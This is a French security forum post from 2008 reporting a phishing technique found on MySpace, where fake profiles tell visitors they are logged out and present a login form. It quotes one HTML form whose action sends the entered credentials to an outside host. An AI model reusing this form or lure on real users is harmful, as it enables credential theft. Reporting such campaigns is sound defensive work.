MAD: Informations » MySpace: Phishing tactique

Auteur	Sujet
¥ω₪h	#0 Wed 07 May 2008 (7:52)
Expert	MySpace: Phishing tactique. Depuis quelques jours, on peux lire ici et là sur la toile des articles concernant l'inauguration de la maison des hackers (HouseOfHackers) preuve que les réseaux sociaux envahissent le web et touchent désormais toutes les classes. Avec plus de 30 millions d'inscriptions, le réseautage social attire la convoitise des personnes mals intentionnées. En effet, on ne compte plus les incidents et les "tonnes" de données dérobées chez les principaux acteurs de ce secteur : MySpace, Habbo, Hi5, Orkut, Facebook, Classmates, Friendster, Bebo, Flixster, Netlog, Tagged, ... Hier, Dancho Danchev, mettait en lumière une méthode ingénieuse qualifiée de phishing "tactique", le but étant de passer au travers des défenses du leader sur ce marché, MySpace. L'ameçonneur génère des profils directement hébergés chez MySpace puis fait croire aux visiteurs qu'ils ne sont pas authentifiés et que c'est la raison pour laquelle le navigateur ne peux afficher la page. L'utilisateur est ainsi poussé de manière quasi-transparente à s'identifier. Un exemple avec le profil: http://myspace.com/ecslut avec pour formulaire: <form action="http://www.myspace101.freeweb7.com/next.php" method="get" name="theForm" id="theForm"></form> Le pirate récupère les identifiants de connexion de sa victime une fois le formulaire de connexion validé. Il apparait clairement qu'ils n'ont fait qu'évaluer le potentiel de ce style d'attaque et qu'ils ne se sont pas lancés dans une véritable campagne de phishing à grande échelle. Si c'était le cas, il y aurait probablement de nombreuses victimes. _______________ « Let's try to subvert our brains, today. » SecuBox Labs, FRANCE « Dernière édition par ¥ω₪h le Wed 07 May 2008 (8:04). »

MySpace: Phishing tactique.

Depuis quelques jours, on peux lire ici et là sur la toile des articles concernant l'inauguration de la maison des hackers (HouseOfHackers) preuve que les réseaux sociaux envahissent le web et touchent désormais toutes les classes. Avec plus de 30 millions d'inscriptions, le réseautage social attire la convoitise des personnes mals intentionnées. En effet, on ne compte plus les incidents et les "tonnes" de données dérobées chez les principaux acteurs de ce secteur : MySpace, Habbo, Hi5, Orkut, Facebook, Classmates, Friendster, Bebo, Flixster, Netlog, Tagged, ...

Hier, Dancho Danchev, mettait en lumière une méthode ingénieuse qualifiée de phishing "tactique", le but étant de passer au travers des défenses du leader sur ce marché, MySpace. L'ameçonneur génère des profils directement hébergés chez MySpace puis fait croire aux visiteurs qu'ils ne sont pas authentifiés et que c'est la raison pour laquelle le navigateur ne peux afficher la page. L'utilisateur est ainsi poussé de manière quasi-transparente à s'identifier.

Un exemple avec le profil: http://myspace.com/ecslut avec pour formulaire:

<form action="http://www.myspace101.freeweb7.com/next.php" 
method="get" name="theForm" id="theForm"></form>

Le pirate récupère les identifiants de connexion de sa victime une fois le formulaire de connexion validé. Il apparait clairement qu'ils n'ont fait qu'évaluer le potentiel de ce style d'attaque et qu'ils ne se sont pas lancés dans une véritable campagne de phishing à grande échelle. Si c'était le cas, il y aurait probablement de nombreuses victimes.

_______________
« Let's try to subvert our brains, today. »
SecuBox Labs, FRANCE

« Dernière édition par ¥ω₪h le Wed 07 May 2008 (8:04). »